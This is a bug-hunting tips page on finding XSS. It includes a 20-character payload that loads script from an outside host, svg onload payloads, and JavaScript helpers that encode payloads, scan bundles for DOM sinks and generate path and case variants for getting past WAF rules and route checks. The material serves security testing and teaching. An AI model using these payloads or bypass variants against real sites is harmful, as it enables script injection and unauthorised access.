Quick Summary
A compact set of real-world bug hunting habits and mindsets
Key Techniques
1) Shortest HTML Context XSS Payload
- The shorter, the stronger: a minimal payload fits into length-limited fields and gives naive filters less to match on.
- Example benchmark:
<script src=//14.rs> (20 chars).
- It needs no closing </script> because the remaining markup is swallowed as script content and the external script still runs; the protocol-relative src saves the scheme. For your own tests, point src at a host you control.
2) Read the HTML Source First
- Start with the raw HTML (Ctrl+U → View Source), not the rendered DOM in DevTools: the raw source is what the server actually sent, before client-side scripts rewrote it. Identify parameters, routes, and the points where user-controlled content is injected before diving into JS.
3) Study the JavaScript Files
- Download and analyze all .js bundles (even minified ones; pretty-print them, or use a source map if one is served). Look for:
- Login or authentication request handlers
- Dynamic path or parameter generation (hidden API routes and parameter names you will not see in the HTML)
- Any client-side filtering or validation code (it often documents exactly what the server does not check)
4) Always URL Encode Payloads
Encode the payload before it goes into a query string or form body. Characters such as #, &, +, = and % are otherwise consumed by the URL parser ('#' ends the query, '&' starts a new parameter, '+' decodes to a space), so the payload that reaches the application is not the one you sent. It's a must for both GET and POST (application/x-www-form-urlencoded) vectors. Encode once for the transport layer; deliberate double encoding is a separate bypass test, not the default.
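Why the encoding matters, as an added example in JavaScript (not code from the original page): the same payload is sent raw and percent-encoded, and a simulated application-side parse shows what survives each way. The host target.example, the parameter name q and the payload are constructed placeholders.

```javascript
// Added example, not from the original page: shows what a URL parser does to a
// raw XSS payload and how percent-encoding keeps it intact. Host, parameter
// name and payload are constructed placeholders.
const BASE = "https://target.example/search"; // assumed endpoint
const PARAM = "q";                              // assumed reflected parameter

// Constructed payload containing every character the URL layer treats as
// syntax: '#' ends the query, '&' starts a new parameter, '+' decodes to a
// space in form encoding and '%' starts an escape sequence.
const PAYLOAD = "<svg onload=alert(1+1)>&x=#y%41";

// Naive approach: paste the payload straight into the query string.
function buildRawUrl(payload) {
  return `${BASE}?${PARAM}=${payload}`;
}

// Recommended approach: percent-encode it first.
function buildEncodedUrl(payload) {
  return `${BASE}?${PARAM}=${encodeURIComponent(payload)}`;
}

// The same rule applies to an application/x-www-form-urlencoded POST body;
// URLSearchParams encodes each field for you.
function buildPostBody(payload) {
  return new URLSearchParams({ [PARAM]: payload }).toString();
}

// Simulate the application side: parse the URL and read the parameter the way
// a form-urlencoded parser does ('+' -> space, %XX decoded, fragment dropped).
function valueSeenByServer(url) {
  return new URL(url).searchParams.get(PARAM);
}

// Raw: the '#...' fragment and the '&x=' part are gone and '+' became a space,
// so the application never sees the payload you meant to test.
console.log(valueSeenByServer(buildRawUrl(PAYLOAD)));     // <svg onload=alert(1 1)>
// Encoded: the payload arrives byte for byte.
console.log(valueSeenByServer(buildEncodedUrl(PAYLOAD))); // <svg onload=alert(1+1)>&x=#y%41
console.log(buildPostBody(PAYLOAD));
```

On the command line the equivalent is curl's --data-urlencode (with -G for a GET query); URLs typed by hand into a proxy repeater need the same treatment.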
5) Debug the DOM — Frameworks Don’t Guarantee Safety
Even in React, Vue, or Angular, the framework's default escaping only covers templated output; developers bypass it whenever they write raw HTML or code by hand.
- Search for innerHTML, dangerouslySetInnerHTML, v-html, bypassSecurityTrustHtml, eval, or new Function, and for the sources that feed them (location.hash, location.search, postMessage data, API responses).
- Use DevTools → Sources → set breakpoints on those sinks → observe which data reaches them during dynamic rendering.
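A first triage pass over a downloaded bundle, covering items 3 and 5, as an added example in JavaScript (not code from the original page). It pulls out string literals that look like request paths, DOM sinks and attacker-controlled sources from the bundle text, with line numbers to set breakpoints on. The bundle below is constructed for the demo; its paths, function names and the axios call are placeholders.

```javascript
// Added example, not from the original page: static triage of a JS bundle.
// SAMPLE_BUNDLE is a constructed, minified-looking snippet, not a real site.
const SAMPLE_BUNDLE = `!function(){var e=document.getElementById("out");
function l(u,p){return fetch("/api/v2/login",{method:"POST",body:JSON.stringify({u:u,p:p})})}
function s(q){return fetch("/api/v2/search?q="+encodeURIComponent(q))}
function r(h){e.innerHTML=h}var t=location.hash.slice(1);r(decodeURIComponent(t));
var f=new Function("return "+t);axios.get("/users/"+t+"/profile")}();`;

// Sinks worth a breakpoint: anything that turns a string into markup or code.
const SINK_PATTERNS = [
  /\.innerHTML\s*=/g,
  /\.outerHTML\s*=/g,
  /dangerouslySetInnerHTML/g,
  /document\.write(ln)?\s*\(/g,
  /\beval\s*\(/g,
  /new\s+Function\s*\(/g,
  /insertAdjacentHTML\s*\(/g,
];

// Sources: where attacker-controlled data enters the script.
const SOURCE_PATTERNS = [
  /location\.(hash|search|href|pathname)/g,
  /document\.(URL|referrer|cookie)/g,
  /window\.name/g,
  /postMessage|onmessage/g,
];

// String literals that look like URL paths: start with '/' and contain no whitespace.
const PATH_LITERAL = /["'`](\/[A-Za-z0-9_\-./?=&:]+)["'`]/g;

// Convert a character offset into a 1-based line number for reporting.
function lineOf(src, offset) {
  return src.slice(0, offset).split("\n").length;
}

// Run every pattern over the source and collect match text plus line number.
function findAll(src, patterns) {
  const hits = [];
  for (const re of patterns) {
    re.lastIndex = 0;
    let m;
    while ((m = re.exec(src)) !== null) {
      hits.push({ match: m[0], line: lineOf(src, m.index) });
    }
  }
  return hits;
}

// Deduplicated, sorted list of path-like string literals (candidate endpoints).
function extractPaths(src) {
  const paths = new Set();
  PATH_LITERAL.lastIndex = 0;
  let m;
  while ((m = PATH_LITERAL.exec(src)) !== null) paths.add(m[1]);
  return [...paths].sort();
}

function triageBundle(src) {
  return {
    sinks: findAll(src, SINK_PATTERNS),
    sources: findAll(src, SOURCE_PATTERNS),
    paths: extractPaths(src),
  };
}

// Example run over the constructed bundle: two sinks (innerHTML on line 4,
// new Function on line 5), one source (location.hash) and four path literals.
const report = triageBundle(SAMPLE_BUNDLE);
console.log(JSON.stringify(report, null, 2));
```

The regexes are deliberately loose: the goal is a short list of places to open in DevTools, not a proof of exploitability. In the sample, location.hash flows into both innerHTML and new Function, which is exactly the pattern to step through with a breakpoint.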
6) XSS in Path (Windows Targets)
Windows-hosted servers sometimes treat a backslash as a path separator and normalize \ and / differently from Unix stacks, while filters and routing rules often only look at /. Inject the payload as a path segment and test both separator forms (and their percent-encoded forms %5C and %2F); path segments are frequently reflected unescaped in error pages, canonical links, and breadcrumb navigation.
7) URL Case Changes and Capitalization
- Servers and routing layers can be case-sensitive in unexpected ways: on a case-insensitive file system (Windows) /Login and /login reach the same resource, but a WAF rule, route blocklist, or access check written for the lowercase form may not fire. Try variations like /Login, /login, /LOGIN, or mixed-case parameter names, and compare the responses.
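A generator for the separator and case variants that items 6 and 7 tell you to try, as an added example in JavaScript (not code from the original page), so the list can be fed to a proxy or a request loop. The route /admin/login and the payload used in the comments are constructed placeholders.

```javascript
// Added example, not from the original page: enumerate path variants for the
// Windows separator and case-sensitivity checks. Routes and payload below are
// constructed placeholders.

// '/' plus the forms a Windows/IIS stack may accept as a separator:
// literal backslash, percent-encoded backslash, percent-encoded slash.
const SEPARATORS = ["/", "\\", "%5C", "%2F"];

// Four case forms of one route segment: lower, UPPER, Title, aLtErNaTiNg.
function caseForms(segment) {
  const lower = segment.toLowerCase();
  const upper = segment.toUpperCase();
  const title = lower.charAt(0).toUpperCase() + lower.slice(1);
  const alternating = [...lower].map((c, i) => (i % 2 ? c.toUpperCase() : c)).join("");
  return [lower, upper, title, alternating];
}

// Build every (case form x separator) combination of routePath. An optional
// payload is appended as the final segment and is never case-transformed:
// HTML attribute names survive uppercasing, JavaScript identifiers do not.
// Encode the payload yourself if the target needs it (item 4).
function pathVariants(routePath, payload = "") {
  const segments = routePath.split("/").filter(Boolean);
  const variants = new Set();
  for (let form = 0; form < 4; form++) {
    const cased = segments.map((s) => caseForms(s)[form]);
    const parts = payload ? [...cased, payload] : cased;
    for (const sep of SEPARATORS) {
      variants.add("/" + parts.join(sep));
    }
  }
  return [...variants];
}

// Example: 16 variants of the route, and 16 of the route with a payload segment.
console.log(pathVariants("/admin/login").join("\n"));
console.log(pathVariants("/admin", "<svg onload=alert(1)>").join("\n"));
```

Send each variant and diff the responses: a 200 for /admin\login where /admin/login returns 403, or a reflection that only appears for the %5C form, is the finding.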